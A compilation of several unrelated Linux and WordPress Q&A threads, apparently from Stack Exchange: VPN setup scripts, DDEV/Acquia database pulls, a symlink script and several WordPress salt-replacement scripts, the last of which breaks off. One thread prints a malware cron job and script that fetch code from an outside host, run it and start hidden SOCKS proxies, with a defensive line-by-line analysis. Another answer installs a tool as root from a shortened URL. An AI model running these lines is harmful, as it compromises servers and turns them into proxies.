NordVPN setup on Linux

NordVPN does not offer an automatic setup for Linux, just OpenVPN config files. What's the best way to implement this?
(My own implementation is below; please feel free to comment or suggest improvements!)
EDIT: When I wrote this, I did not know that NordVPN had recently introduced a command-line tool for Linux.

I have written a little script that downloads the config files, renames them, and enables automatic authentication. Insert your NordVPN login credentials in the "generate authentication file" part.
#!/bin/bash
# run as root!!!
# install openvpn. I'm running arch, this might be different on your system.
pacman -S openvpn
# go to openvpn config folder
cd /etc/openvpn
# download config files, extract and clean up
wget https://downloads.nordcdn.com/configs/archives/servers/ovpn.zip
unzip ovpn.zip
rm ovpn.zip
# rename tcp config files and put them in /etc/openvpn/client
cd ovpn_tcp
for file in *; do mv "${file}" "${file/.nordvpn.com.tcp.ovpn/}tcp.conf"; done
cp * ../client
# rename udp config files and put them in /etc/openvpn/client
cd ../ovpn_udp
for file in *; do mv "${file}" "${file/.nordvpn.com.udp.ovpn/}udp.conf"; done
cp * ../client
# generate authentication file
cd ../client
printf "<your email>\n<your password>" > auth.txt
# make all configs use the authentication file
find . -name '*.conf' -exec sed -i -e 's/auth-user-pass/auth-user-pass\ auth.txt/g' {} \;
# clean up
cd ..
rm -r ovpn_tcp/
rm -r ovpn_udp
You can now start and stop VPN connections via e.g.
systemctl start openvpn-client@de415tcp.service
and
systemctl stop openvpn-client@de415tcp.service
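The name between the @ and .service must match one of the .conf files the setup script placed in /etc/openvpn/client. To see which profiles are available, something like:
ls /etc/openvpn/client/ | grep '\.conf$' | sed 's/\.conf$//'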
To automate this, and to connect to the server recommended by NordVPN, I have written two scripts. Make them executable and put them somewhere in your $PATH.
Pass a country code (like us, de or uk) as a command-line argument to start-vpn if you want to choose a specific country. It automatically chooses a TCP connection; you can change that to UDP if you want.
start-vpn
#!/usr/bin/python
import sys
import requests
import os
import time

# you don't necessarily need the following. It's for monitoring via i3blocks.
def notify_i3blocks():
    os.system('pkill -RTMIN+12 i3blocks')

def fork_and_continue_notifying_in_background():
    newpid = os.fork()
    if newpid == 0:  # if this is the child process
        for i in range(60):
            notify_i3blocks()
            time.sleep(1)

if __name__ == '__main__':
    notify_i3blocks()
    # below is what you do need.
    suffix = ''
    if len(sys.argv) > 1:
        countries = requests.get('https://nordvpn.com/wp-admin/admin-ajax.php?action=servers_countries').json()
        for country in countries:
            if country["code"].lower() == sys.argv[1].lower():
                suffix = '&filters={"country_id":' + str(country["id"]) + '}'
    result = requests.get('https://nordvpn.com/wp-admin/admin-ajax.php?action=servers_recommendations' + suffix)
    profile = result.json()[0]['subdomain'] + 'tcp'
    command = 'systemctl start openvpn-client@' + profile + '.service'
    os.system(command)
    # the following is for i3blocks again.
    fork_and_continue_notifying_in_background()
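Once it is executable and on your $PATH, usage looks like this (run as root, since it starts a systemd unit; the aliases further down take care of that):
start-vpn      # connect to the recommended server
start-vpn de   # connect to the recommended server in Germany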
stop-vpn
#!/bin/bash
function service {
    systemctl |
        grep openvpn |
        grep running |
        head -n1 |
        awk '{print $1;}'
}
while [[ $(service) ]]; do
    systemctl stop $(service)
done
# notify i3blocks
pkill -RTMIN+12 i3blocks
For convenience, I have two aliases in my ~/.bashrc:
alias start-vpn='sudo start-vpn'
alias stop-vpn='sudo stop-vpn'
If you do want to monitor it via i3blocks, put this in your i3blocks config:
[vpn]
interval=once
signal=12
and this in your i3blocks-scripts-directory (with name vpn):
#!/bin/bash
function name {
    systemctl |
        grep openvpn |
        grep running |
        head -n1 |
        awk '{print $1;}' |
        cut -d @ -f 2 |
        cut -d . -f 1
}
starting=$(pgrep -f start-vpn) # this might not be the most accurate, but it works for me. Improvement suggestions are welcomed.
if [[ $(name) ]]; then
    echo $(name)
    echo && echo "#00FF00"
else
    if [[ ${starting} ]]; then
        echo starting vpn...
        echo && echo "#FFFF00"
    else
        echo no vpn
        echo && echo "#FF0000"
    fi
fi
In order to automatically start and stop the VPN when a network interface goes up or down, put the following in /etc/NetworkManager/dispatcher.d/10-openvpn. To activate the feature you need to enable and start NetworkManager-dispatcher.service.
At my university, I connect to eduroam, which does not allow VPN. That's why I exclude it.
/etc/NetworkManager/dispatcher.d/10-openvpn
#!/bin/bash
case "$2" in
    up)
        if ! nmcli -t connection | grep eduroam | grep wlp3s0; then
            start-vpn
        fi
        ;;
    down)
        stop-vpn
        ;;
esac
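NetworkManager only runs dispatcher scripts that are owned by root and executable, so, roughly:
chown root:root /etc/NetworkManager/dispatcher.d/10-openvpn
chmod 755 /etc/NetworkManager/dispatcher.d/10-openvpn
systemctl enable --now NetworkManager-dispatcher.service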
I hope this helps other people who want to use NordVPN on linux. Again, feel free to comment and suggest improvements.
In particular, I am not sure how much of a security risk it is to have the NordVPN password written out in plain text in a file.
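At minimum, it is worth restricting the file so that only root (which is what reads it here) can see it:
chown root:root /etc/openvpn/client/auth.txt
chmod 600 /etc/openvpn/client/auth.txt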


DDEV multisite setup with Acquia pull

I've just gotten DDEV set up and I have multisite working by manually running ddev import-db --target-db=[db-name]. It's working just fine, but I would like to figure out how to get database pulls from Acquia to work where I can specify the site to pull from.
I have this script working but is there a way to do this with DDEV commands that would be a little cleaner?
First I modified acquia.yaml to this:
environment_variables:
  project_id: mysite.dev
  uri: mysite.com
  db_name: mysite_us
  #uri: mysite.ca
  #db_name: mysite_canada
  #uri: mysite.co.uk
  #db_name: mysite_unitedkingdom
  # etc etc
db_pull_command:
  command: |
    # set -x # You can enable bash debugging output by uncommenting
    ls /var/www/html/.ddev >/dev/null # This just refreshes stale NFS if possible
    pushd /var/www/html/.ddev/.downloads >/dev/null
    acli remote:drush -n ${project_id} -- sql-dump --extra-dump=--no-tablespaces --uri=${uri} >${db_name}.sql
Then I wrote the following script, which I call like:
./ddev-refresh-db.sh mysite_us mysite.com
#!/bin/bash
site="$1"
uri="$2"
ddev pull acquia
ddev import-db --target-db=${site} --src=.ddev/.downloads/${site}.sql
ddev drush --uri=${uri} cr
However, this still requires us to change the site and URI in the acquia.yaml file before running the command.
Is there a way to pass a variable through to ddev pull acquia? And is there a way to mimic what this script is doing with a real DDEV command?
Here's a more complete answer for Acquia multisite pull, pulling all sites. As of DDEV v1.18.0, ddev pull itself really isn't robust enough to pull multiple sites, because it assumes one database and one set of files. This works where @kelly howard's answer in https://stackoverflow.com/a/68553116/215713 is inadequate. (In her example, she pulls just one of the multisites, and it works great for that situation.)
But here we'll put all the logic in a DDEV custom command and pull all databases and files for any named site, so ddev acquiapull <sitename>
Place this file in the project as .ddev/commands/web/acquiapull
#!/bin/bash

# This DDEV custom command is set up to pull database and files from Acquia for several subsites.
# Usage: `ddev acquiapull [ --skip-db ] [ --skip-files ] <site1> <site2>`
# Example: `ddev acquiapull subsite1`
# This assumes that each subsite has its own database (named for the site)
# and that each subsite has its own files in sites/<sitename>/files
# To use it set up the needed ACQUIA_API_KEY and ACQUIA_API_SECRET in global
# or project config, just as described in
# https://ddev.readthedocs.io/en/stable/users/providers/acquia/

acquia_project_id=myprojectid.dev
tmpdir=/tmp # inside web container

set -eu -o pipefail

while :; do
    case ${1:-} in
        -h | -\? | --help)
            show_help
            exit
            ;;
        -y | --yes)
            SKIP_CONFIRMATION=true
            ;;
        --skip-files)
            SKIP_FILES=true
            ;;
        --skip-db)
            SKIP_DB=true
            ;;
        --) # End of all options.
            shift
            break
            ;;
        -?*)
            printf 'WARN: Unknown option (ignored): %s\n' "$1" >&2
            ;;
        *) # Default case: No more options, so break out of the loop.
            break ;;
    esac
    shift
done

# Map sitename to database name
function target_db_name() {
    site_name=$1
    echo ${site_name}
}

# Map sitename to files dir
function target_files_dir() {
    site_name=$1
    echo "sites/${site_name}/files"
}

# Get the files from upstream and load them.
function files_pull() {
    # set -x # You can enable bash debugging output by uncommenting
    set -eu -o pipefail
    site_name=$1
    files_dir=$(target_files_dir $1)
    mkdir -p ${DDEV_DOCROOT}/${files_dir}/
    echo "Using drush rsync to update files for ${site_name}..."
    drush rsync --alias-path=~/.drush -q -y -r ${DDEV_DOCROOT} --verbose @${acquia_project_id}:${files_dir}/ ${DDEV_DOCROOT}/${files_dir}/
}

# Get the db from upstream and load it
function db_pull() {
    # set -x # You can enable bash debugging output by uncommenting
    set -eu -o pipefail
    site_name=$1
    target_db=$(target_db_name ${site_name})
    echo "Downloading ${site_name} database..."
    acli remote:drush -n ${acquia_project_id} -- sql-dump --uri=${site_name} --extra-dump=--no-tablespaces >${tmpdir}/${site_name}.sql
    echo "Loading ${site_name} into database '${target_db}'..."
    mysql -uroot -proot -e "CREATE DATABASE IF NOT EXISTS ${target_db}; GRANT ALL ON ${target_db}.* TO 'db'@'%'"
    mysql -uroot -proot ${target_db} <${tmpdir}/${site_name}.sql
    drush -r root --uri=${site_name} cr
}

# Handle initial authentication via Acquia secrets and ssh
function authenticate() {
    if [ -z "${ACQUIA_API_KEY:-}" ] || [ -z "${ACQUIA_API_SECRET:-}" ]; then echo "Please make sure you have set ACQUIA_API_KEY and ACQUIA_API_SECRET in your project or global config" && exit 1; fi
    if ! command -v drush >/dev/null; then echo "Please make sure your project contains drush, ddev composer require drush/drush" && exit 1; fi
    ssh-add -l >/dev/null || (echo "Please 'ddev auth ssh' before running this command." && exit 1)
    acli auth:login -n --key="${ACQUIA_API_KEY}" --secret="${ACQUIA_API_SECRET}"
    acli remote:aliases:download -n >/dev/null
}

# Main script
authenticate || { printf "Failed to authenticate\n"; exit 1; }

if [ $# -eq 0 ]; then
    printf "Usage: ddev acquiapull [ --skip-db ] [ --skip-files ] <sitename>\n"
    exit 1
fi

if [ "${SKIP_CONFIRMATION:-}" != "true" ]; then
    echo "This will overwrite your database and files for sites $*. OK?"
    select yn in "Yes" "No"; do
        case $yn in
            Yes ) break;;
            No ) exit;;
        esac
    done
fi

for subsite in $*; do
    echo "Pulling subsite: $subsite"
    if [ "${SKIP_DB:-}" != "true" ]; then
        db_pull ${subsite} || { printf "Failed to pull db for ${subsite}\n"; exit 1; }
    else
        echo "Skipping db pull for ${subsite}"
    fi
    if [ "${SKIP_FILES:-}" != "true" ]; then
        files_pull ${subsite} || { printf "Failed to pull files for ${subsite}\n"; exit 1; }
    else
        echo "Skipping files pull for ${subsite}"
    fi
done
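Make the command executable and it becomes available as a ddev subcommand (the site names here are placeholders):
chmod +x .ddev/commands/web/acquiapull
ddev acquiapull subsite1 subsite2
ddev acquiapull --skip-files subsite1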
Thanks to the guidance from @rfay I set up a set of files in .ddev/providers for each country. Each one is structured like this:
environment_variables:
  uri: mysite.be
  db_name: belgium
auth_command:
  command: |
    <no changes>
db_pull_command:
  command: |
    # set -x # You can enable bash debugging output by uncommenting
    ls /var/www/html/.ddev >/dev/null # This just refreshes stale NFS if possible
    pushd /var/www/html/.ddev/.downloads >/dev/null
    acli remote:drush -n ${ACQUIA_PROJECT_ID} -- sql-dump --extra-dump=--no-tablespaces --uri=${uri} >${db_name}.sql
Then I created a custom command in .ddev/commands/host that has the contents of my script. There are more cases in the real script to cover all the countries.
#!/usr/bin/env bash

## Description: Refresh a database from Acquia and run post-db commands
## Usage: refresh-db [dbname]
## Example: "ddev refresh-db france"

site="$1"
case $site in
    canada)
        uri="mysite.ca"
        ;;
    australia)
        uri="mysite.com.au"
        ;;
    belgium)
        uri="mysite.be"
        ;;
    brazil)
        uri="mysite.com.br"
        ;;
    *)
        site="db"
        uri="mysite.com"
        ;;
esac
ddev pull ${site} -y 2>/dev/null # suppress the "pull failed" message, since it didn't actually fail
ddev import-db --target-db=${site} --src=${DDEV_APPROOT}/.ddev/.downloads/${site}.sql
ddev drush --uri=${uri} cr
ddev drush --uri=${uri} -y pmu simplesamlphp_auth
ddev drush --uri=${uri} -y config-set system.performance css.preprocess 0
ddev drush --uri=${uri} -y config-set system.performance js.preprocess 0
I tried to handle the db import during the db_pull_command as suggested, but I couldn't get past database permission errors when importing a DB that I had not already imported using ddev import-db. With the custom command, however, I can also incorporate the post-db-import steps that would normally only run against the default DB if done through config.yaml.
The other change I made was to move the project ID into the web environment settings in global_config.yaml file. This way if we want to change the environment we want to pull from, we just make an edit to the project ID there and don't have to edit the provider files.
I'm not experienced with contributing back to open source projects but if this can be helpful to others I'd love to work with someone to do that pull request on the documentation or wherever it belongs.
I'm going to go ahead and answer in general, but you can add a full answer when you get this sorted out. (I don't have access to an Acquia multisite.)
You're on the right track, but you can do all of this in the pull script. The problem you're having is that ddev just assumes a single database, and you have multiple.
Here's a strategy for your acquia.yaml:
Create all the databases. You can use mysql -e "CREATE DATABASE IF NOT EXISTS <dbname>;", with several lines or a for loop.
Pull all the databases. You can do this with separate acli lines, or use a for loop.
Import the databases that aren't the primary db using the mysql command: mysql <dbname> < <dbname>.sql. Again, this can be a few lines or a for loop. (You can also just import the primary db; it will simply be re-imported by ddev, no harm done if it's not large.) A combined sketch follows below.
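Putting those three steps together, a hypothetical sketch of what the db_pull_command body could look like (the URI-to-database pairs are placeholders):
# hypothetical: pull and import every subsite in one pass
for pair in "mysite.com:mysite_us" "mysite.ca:mysite_canada"; do
  uri=${pair%%:*}; db=${pair##*:}
  mysql -uroot -proot -e "CREATE DATABASE IF NOT EXISTS ${db};"
  acli remote:drush -n ${project_id} -- sql-dump --extra-dump=--no-tablespaces --uri=${uri} >${db}.sql
  mysql -uroot -proot ${db} <${db}.sql
done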
Thanks for the great question, and I hope you'll give a full answer here. Your answer could also be incorporated into https://ddev.readthedocs.io/en/stable/users/providers/acquia/ - you could do a PR there by clicking the pencil link at the upper right.

some malware that appeared on our site related to the recent wordpress attack

Apparently a site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in WordPress. The result of the breach was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
the file it was pulling is this (obviously, don't try to execute this...)
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.
I just can't figure out what the heck that file was actually doing.
Quick Summary
In summary, it kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.
In Depth
In more detail, let's look at the script line-by-line:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar and untars it in the /tmp/stest directory, deletes the tar file, and moves into the directory which now holds the downloaded files.
sh getip >>bug.txt
The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.
More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl, which can be downloaded from sourceforge. The version used here differs from the sourceforge version in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script rather than passed in on the command line. I suspect that the purpose of the latter change is to make the script's command line look relatively innocuous when viewed with a utility such as ps.
bash binded.txt
The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.
cd ..
rm -rf stest
The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.
How to determine if one of the SOCKS servers is still running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if one is still running, look through the output of ps wax and check whether you see that command. If you do, use the kill command to stop it.
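For example (the brackets keep grep from matching its own process entry):
ps wax | grep '[p]erl httpd'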

sh script: no output when run in mounted filesystem

Need some help to understand what's wrong.
In short: I've written a bourne shell script, which creates links to contents of source directory in the target directory.
It worked fine on the host system, but when targeted at directories on a mounted fs (both from chroot and from the native system) it doesn't work and produces no output at all.
Details:
mounted fs: ext3, rw
host system: 3.2.0-48-generic #74-Ubuntu SMP GNU/Linux
To narrow the question, "/usr" was taken as an example.
permissions for "/usr" in the host system: drwxr-xr-x
permissions for "/usr" on mounted partition: drwxr-xr-x
Tried to use both bash and dash from host system. Same result - works for native file systems, does not work for the mounted.
script (cord.sh; run from root in my cases):
#!/bin/sh
SRCFOLDER=$2               # folder with package installation
DESTFOLDER=$3              # destination folder to install symlinks to ('/' - for base sys; '/usr' - userland)
TARGETS=$(ls $SRCFOLDER)   # targets to handle
SRCFOLDER=${SRCFOLDER%/}   # stripping slashes from the end, if they are present
DESTFOLDER=${DESTFOLDER%/} #

##
## LINKING
##
if [ "$1" = "-c" ]; then
    printf %s "$TARGETS" | while IFS= read -r line
    do
        current_target=$(file $SRCFOLDER/$line) # had an issue with different output in different systems
        if [ "${current_target% }" = "$SRCFOLDER/$line: directory" ]; then # stripping space helped
            mkdir -v $DESTFOLDER/$line                                    # if other package created it - it'll fail
            /usr/local/bin/cord.sh -c $SRCFOLDER/$line $DESTFOLDER/$line  # RECURSION
        else
            ln -sv $SRCFOLDER/$line $DESTFOLDER/$line                     # will fail, if exists
        fi
    done
##
## REMOVING LINKS
##
elif [ "$1" = "-d" ]; then
    printf %s "$TARGETS" | while IFS= read -r line
    do
        current_target=$(file $SRCFOLDER/$line)
        if [ "${current_target% }" = "$SRCFOLDER/$line: directory" ]; then
            /usr/local/bin/cord.sh -d $SRCFOLDER/$line $DESTFOLDER/$line  # RECURSION
        else
            rm -v $DESTFOLDER/$line
        fi
    done
elif [ "$1" = "-h" ]; then
    echo "Usage:"
    echo "cord -c /path/to/pkgdir /path/to/linkdir - create symlinks for package contents"
    echo "cord -d /path/to/pkgdir /path/to/linkdir - delete links for package"
    echo "cord -h - displays this help note"
else
    echo "Usage:"
    echo "cord -c /path/to/pkgdir /path/to/linkdir - create symlinks for package contents"
    echo "cord -d /path/to/pkgdir /path/to/linkdir - delete links for package"
    echo "cord -h - displays this help note"
fi
The most obvious thing to suspect was some issue with permissions. Yet everything looks sane. Maybe I've missed something?
I don't know what your main problem might be (permissions or something else; you should include an example of how you run the script and how you prepare for it with the mounts and everything), but this script can be cleaned up.
First, if you want to test whether something is a directory, use
if [ -d "$something" ]
That'll get rid of the clumsy file usage.
Second, don't go through the redundant steps of converting your $TARGETS variable to a series of lines and then reading the lines with a loop. Just loop over the words directly:
for line in $TARGETS
Also, instead of using ls to populate a variable with filenames, I'd use a glob. But instead of either of those, I'd use find, so it can take care of recursion and eliminate the tree of processes you're creating by recursing with calls to the same script. And instead of writing a symlink-tree-maker script, I'd use something like lndir, which already exists for that purpose; see the sketch below.
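For example, lndir builds the whole tree of symlinks in one call:
lndir /path/to/pkgdir /path/to/linkdir
And a rough find-based sketch of the same idea (the paths are placeholders):
SRC=/path/to/pkgdir; DEST=/path/to/linkdir
# recreate the directory tree, then symlink everything that is not a directory
find "$SRC" -type d | while IFS= read -r d; do mkdir -p "$DEST${d#$SRC}"; done
find "$SRC" ! -type d | while IFS= read -r f; do ln -sv "$f" "$DEST${f#$SRC}"; done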

Download and insert salt string inside wordpress wp-config.php with Bash

How can I insert the content of the variable $SALT at a specific point (line or string) of a file like wp-config.php from WordPress, using a Bash script?
SALT=$(curl -L https://api.wordpress.org/secret-key/1.1/salt/)
I'm not an expert at parsing text files in bash, but you should delete the lines that define the keys you're downloading from the WordPress salt endpoint and then insert the variable at the end... something like:
#!/bin/sh
SALT=$(curl -L https://api.wordpress.org/secret-key/1.1/salt/)
STRING='put your unique phrase here'
printf '%s\n' "g/$STRING/d" a "$SALT" . w | ed -s wp-config.php
OK, now it's fixed... it looks for where the salt is supposed to go and replaces it with the info retrieved from https://api.wordpress.org/secret-key/1.1/salt/
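For reference, this is what that printf feeds to ed, one command per line:
# g/put your unique phrase here/d   delete every placeholder line
# a                                 start appending text
# (the contents of $SALT)           the new define() lines
# .                                 end the appended text
# w                                 write wp-config.php back to disk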
This version defines new keys if none exist, and also replaces existing keys:
#!/bin/bash
find . -name wp-config.php -print | while read line
do
    curl http://api.wordpress.org/secret-key/1.1/salt/ > wp_keys.txt
    sed -i.bak -e '/put your unique phrase here/d' -e \
        '/AUTH_KEY/d' -e '/SECURE_AUTH_KEY/d' -e '/LOGGED_IN_KEY/d' -e '/NONCE_KEY/d' -e \
        '/AUTH_SALT/d' -e '/SECURE_AUTH_SALT/d' -e '/LOGGED_IN_SALT/d' -e '/NONCE_SALT/d' $line
    cat wp_keys.txt >> $line
    rm wp_keys.txt
done
If you have csplit available, you can split the original wp-config.php file either side of the salt definitions, download new salts, then cat back together. This keeps the PHP define() statements at the same location in wp-config.php instead of than moving them to a different location within the file:
# Download new salts
curl "https://api.wordpress.org/secret-key/1.1/salt/" -o salts
# Split wp-config.php into 3 on the first and last definition statements
csplit wp-config.php '/AUTH_KEY/' '/NONCE_SALT/+1'
# Recombine the first part, the new salts and the last part
cat xx00 salts xx02 > wp-config.php
# Tidy up
rm salts xx00 xx01 xx02
How about using sed? Note that you cannot pipe a file through sed and redirect the output back to the same file (cat wp-config.php | sed ... > wp-config.php truncates wp-config.php before it is read); use in-place editing instead:
sed -i 's/old_string/new_string/g' wp-config.php
I think I got this one! It's a bash script using only commands normally available at the command prompt, and it does -everything- (assuming httpd is your web user) except create the databases. Here you go.
#!/bin/bash
# wordpress latest auto-install script, by alienation 24 jan 2013. run as root.
# usage: ~/wp-install alien /hsphere/local/home/alien/nettrip.org alien_wpdbname alien_wpdbusername p#sSw0rd
# ( wp-install shell-user folder db-name db-user-name db-user-pw )
# download wordpress to temporary area
cd /tmp
rm -rf tmpwp
mkdir tmpwp
cd tmpwp
wget http://wordpress.org/latest.tar.gz
tar -xvzpf latest.tar.gz
# copy wordpress to where it will live, and go there, removing index placeholder if there is one
mv wordpress/* $2
cd $2
rm index.html
# create config from sample, replacing salt example lines with a real salt from online generator
grep -A 1 -B 50 'since 2.6.0' wp-config-sample.php > wp-config.php
wget -O - https://api.wordpress.org/secret-key/1.1/salt/ >> wp-config.php
grep -A 50 -B 3 'Table prefix' wp-config-sample.php >> wp-config.php
# put the appropriate db info in place of placeholders in our new config file
replace 'database_name_here' $3 -- wp-config.php
replace 'username_here' $4 -- wp-config.php
replace 'password_here' $5 -- wp-config.php
# change file ownership and permissions according to ideal at http://codex.wordpress.org/Hardening_WordPress#File_Permissions
touch .htaccess
chown $1:httpd .htaccess
chown -R $1:httpd *
find . -type d -exec chmod 755 {} \;
find . -type f -exec chmod 644 {} \;
chmod -R 770 wp-content
chmod -R g-w wp-admin wp-includes wp-content/plugins
chmod g+w .htaccess
# thats it!
echo ALL DONE
I built a simple CLI for just that. Try it out. It's called WP-Salts-Update-CLI.
WP-Salts-Update-CLI
WPSUCLI downloads new salts from the WP API and replaces them with the ones in your wp-config.php file for every site on your server.
⚡️ Installation
Open command line terminal (I prefer iTerm2) and run the following command.
sudo wget -qO wpsucli https://git.io/vykgu && sudo chmod +x ./wpsucli && sudo install ./wpsucli /usr/local/bin/wpsucli
This command will perform the following actions:
Use sudo permissions
Use wget to download WPSUCLI and rename it to wpsucli
Make the wpsucli executable
Install wpsucli inside /usr/local/bin/ folder.
🙌 Usage
Just run wpsucli and it will update the salts for every wp-config.php file on your server or PC.
This is the bash script that I came up with that works on my Ubuntu server. I modified the examples from above.
It's a bit brute-force in that it only replaces the 8 keys that are currently required, and it expects the server to return exactly the same length of key every time. The script works well for my use case, so I thought I would share it.
CONFIG_FILE=wp-config.php
SALT=$(curl -L https://api.wordpress.org/secret-key/1.1/salt/)
SRC="define('AUTH_KEY'"; DST=$(echo $SALT|cat|grep -o define\(\'AUTH_KEY\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('SECURE_AUTH_KEY'"; DST=$(echo $SALT|cat|grep -o define\(\'SECURE_AUTH_KEY\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('LOGGED_IN_KEY'"; DST=$(echo $SALT|cat|grep -o define\(\'LOGGED_IN_KEY\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('NONCE_KEY'"; DST=$(echo $SALT|cat|grep -o define\(\'NONCE_KEY\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('AUTH_SALT'"; DST=$(echo $SALT|cat|grep -o define\(\'AUTH_SALT\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('SECURE_AUTH_SALT'"; DST=$(echo $SALT|cat|grep -o define\(\'SECURE_AUTH_SALT\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('LOGGED_IN_SALT'"; DST=$(echo $SALT|cat|grep -o define\(\'LOGGED_IN_SALT\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('NONCE_SALT'"; DST=$(echo $SALT|cat|grep -o define\(\'NONCE_SALT\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
I tried the accepted solution:
#!/bin/sh
SALT=$(curl -L https://api.wordpress.org/secret-key/1.1/salt/)
STRING='put your unique phrase here'
printf '%s\n' "g/$STRING/d" a "$SALT" . w | ed -s wp-config.php
However, it does not work perfectly: for some reason it causes the SALTS to "move down" one line in the wp-config.php file each time it is used... which is not ideal if you are going to change SALTS automatically, say every week or month with cron.
A better solution for me was to create a little function that I call in my script.
This function creates a file with the SALTS (and deletes it at the end), deletes every line containing one of the SALTS, then inserts the SALTS contained in the file in place of the initial ones.
This works perfectly.
fct_update_salts() {
    # Requires website path as target
    curl http://api.wordpress.org/secret-key/1.1/salt/ > ~/SALTS.txt
    var_initial_path1=`pwd`
    cd ~ # going to home directory
    # This script eliminates successively all SALT entries, replaces the last one by XXX as a marker,
    # places SALTS.txt below XXX and deletes XXX
    sudo sed -i "/SECURE_AUTH_KEY/d" $1/wp-config.php
    sudo sed -i "/LOGGED_IN_KEY/d" $1/wp-config.php
    sudo sed -i "/NONCE_KEY/d" $1/wp-config.php
    sudo sed -i "/AUTH_SALT/d" $1/wp-config.php
    sudo sed -i "/SECURE_AUTH_SALT/d" $1/wp-config.php
    sudo sed -i "/LOGGED_IN_SALT/d" $1/wp-config.php
    sudo sed -i "/NONCE_SALT/d" $1/wp-config.php
    sudo sed -i "/AUTH_KEY/cXXX" $1/wp-config.php
    sudo sed -i '/XXX/r SALTS.txt' $1/wp-config.php
    sudo sed -i "/XXX/d" $1/wp-config.php
    echo "SALTS REPLACED BY:"
    echo "====================="
    cat ~/SALTS.txt
    sudo rm -rf ~/SALTS.txt
    cd $var_initial_path1
}
The function is to be called in the script like this:
# Reset SALTS
fct_update_salts $SITE_PATH
Where $SITE_PATH="/var/www/html/YOUR_WEBSITE" or whatever path works for you.
I was challenged with the same issue. Here is the script I wrote to replace the salts and keys from ones downloaded from WordPress. You can use it at any time to replace them if/when needed. I run it as sudo, and the script tests for that. If you use an account that can download to the directory and make updates to the wp-config.php file, then you can delete that part of the script.
#!/bin/sh
# update-WordPress-Salts: Updates WordPress Salts
# written by Wayne Woodward 2017
if [ $# -lt 1 ]; then
echo "Usage: update-WordPress-Salts directory"
exit
fi
if [ "$(whoami)" != "root" ]; then
echo "Please run as root (sudo)"
exit
fi
WPPATH=$1
# Update the salts in the config file
# Download salts from WordPress and save them locally
curl http://api.wordpress.org/secret-key/1.1/salt/ > /var/www/$WPPATH/wp-keys.txt
# Iterate through each "Saltname" and append 1 to it
# For a couple names that may match twice like "AUTH_KEY" adds extra 1s to the end
# But that is OK as when this deletes the lines, it uses the same matching pattern
# (Smarter people may fix this)
for SALTNAME in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT
do
sed -i -e "s/$SALTNAME/${SALTNAME}1/g" /var/www/$WPPATH/wp-config.php
done
# Find the line that has the updated AUTH_KEY1 name
# This is so we can insert the file in the same area
line=$(sed -n '/AUTH_KEY1/{=;q}' /var/www/$WPPATH/wp-config.php)
# Insert the file from the WordPress API that we saved into the configuration
sed -i -e "${line}r /var/www/$WPPATH/wp-keys.txt" /var/www/$WPPATH/wp-config.php
# Iterate through the old keys and remove them from the file
for SALTNAME in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT
do
sed -i -e "/${SALTNAME}1/d" /var/www/$WPPATH/wp-config.php
done
# Delete the file downloaded from Wordpress
rm /var/www/$WPPATH/wp-keys.txt
Many of the answers rely on the phrase 'put your unique phrase here' being present in the file, so they do not work when you want to change salts after the first time. There are also some that remove the old definitions and append the new ones at the end. While that does work, it's nice to keep the definitions where you would expect them, right after the comment documenting them. My solution addresses those issues.
I made a few attempts with sed, perl and regex, but there are special characters in the salts and the rest of the config file that tend to mess things up. I ended up using grep to search the document for the unique comment structure that opens and closes the salt definition block, which has the following format:
/**#@+
<comment documentation>
*/
<salt definitions>
/**#@-*/
Note that if that comment structure is removed or altered, this will no longer work. Here's the script:
#!/bin/bash -e
# Set Default Settings:
file='wp-config.php'
# set up temporary files with automatic removal:
trap "rm -f $file_start $file_end $salt" 0 1 2 3 15
